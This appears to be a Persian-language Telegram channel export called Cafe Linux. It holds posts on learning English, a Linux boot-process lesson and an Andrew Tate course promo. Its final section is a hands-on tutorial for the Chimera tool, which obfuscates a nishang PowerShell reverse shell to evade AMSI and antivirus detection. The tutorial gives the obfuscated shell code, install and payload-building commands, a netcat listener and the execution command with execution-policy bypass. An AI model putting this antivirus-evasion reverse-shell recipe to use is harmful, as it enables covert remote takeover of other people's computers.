Cafe Linux
Voice message
🔹 درمورد اینه که انگلیسی چجوری بخونید ، یه سریاتون پرسیده بودید . نظرات خودمو دادم
❤4👨💻3👍1
Cafe Linux
Voice message
درمورد لهجه های مختلف هم بعدا حرف میزنم ، قرار نیست با لهجه صحبت کنم ولی فقط میگم که چندتا لهجه و زبان محلی داخل انگلیسی داریم که اطلاعاتتون بره بالا
👍6
Media is too big
VIEW IN TELEGRAM
Hustlers University 2.0 | FREE 1 Hour Training Hosted by Andrew Tate
👍6
Cafe Linux
Hustlers University 2.0 | FREE 1 Hour Training Hosted by Andrew Tate
حقایق پول ، اندرو تیت 👑 ، علاقمندان ببینن
👎2
🔹 فیلم بعدی فردا رلیز میشه چون دسترسی به سیستم ندارم دوستان ، ولی فیلم بعدی یکی از مهم ترین ویدیوهای این فصل لینوکسیه که رکورد کردم .
💯3👍1
دوستان فیلم رکورد شده ولی به دلیل ضعیف بودن اینترنت ( بگو مرگ بر امریکا ) به سختی آپلود میشه . آپلود بشه حتما میزارمش . من از طرف آمریکا از شما معذرت خواهی میکنم .
🏆6⚡1🍾1
بعد از 40 دقیقه 30 مگابایت آپلود بشه نشون دهنده اینه که ما قدرت اول جهانیم
🤬12🕊3
Media is too big
VIEW IN TELEGRAM
🔸 CafeLinux Linux Essential 7
🔹 Hardware
🔹 Boot Loader
🔹 Firmwares
🔹 How Linux boots
🔹 What is FHS ( intro )
توضیح دادم سخت افزارتون چجوری firmware رو ران میکنه ، سیستم عامل چجوری سخت افزار و میشناسه ، چجوری میرسیم به بوت لودر ،بوت لودر چجوری کرنل رو اجرا میکنه و بعدش چی میشه و . . . .
#CafeLinux #linuxessential #Linux
🔹 Hardware
🔹 Boot Loader
🔹 Firmwares
🔹 How Linux boots
🔹 What is FHS ( intro )
توضیح دادم سخت افزارتون چجوری firmware رو ران میکنه ، سیستم عامل چجوری سخت افزار و میشناسه ، چجوری میرسیم به بوت لودر ،بوت لودر چجوری کرنل رو اجرا میکنه و بعدش چی میشه و . . . .
#CafeLinux #linuxessential #Linux
👍11❤3
This media is not supported in your browser
VIEW IN TELEGRAM
[ Tags ]
#Malware #Bypass #AMSI #AntiVirus #Chimera #Script
➖➖➖➖➖➖➖➖
آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها )
➖➖➖➖➖➖➖➖
#Malware #Bypass #AMSI #AntiVirus #Chimera #Script
➖➖➖➖➖➖➖➖
آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها )
➖➖➖➖➖➖➖➖
❤2
ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
1. نصب پیش نیاز ها :
1. ساخت Payload :
1.2 تغییر ایپی :
پورت دیفالت اسکریپت 444 هستش :
1. ایجاد Listener در لینوکس با NetCat :
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
➖➖➖➖➖➖➖➖
✅ نحوه ی نصب در Linux :1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
2. کلون کردن ریپو :sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) : sudo chown root:root -R /opt/chimera/
4. تغییر مسیر به opt/chimera/ :cd /opt/chimera/
5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :sudo chmod +x chimera.sh
6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :./chimera.sh —help
➖➖➖➖➖➖➖➖
✅ نحوه ی استفاده از اسکریپت :1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1
2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1
➖➖➖➖➖➖➖➖
✅ گرفتن دسترسی :1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :powershell.exe -ep bypass C:\<PATH>\Payload.ps1
و تمام.امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
GitHub
nishang/Shells/Invoke-PowerShellTcp.ps1 at master · samratashok/nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security. - samratashok/nishang
❤4👍1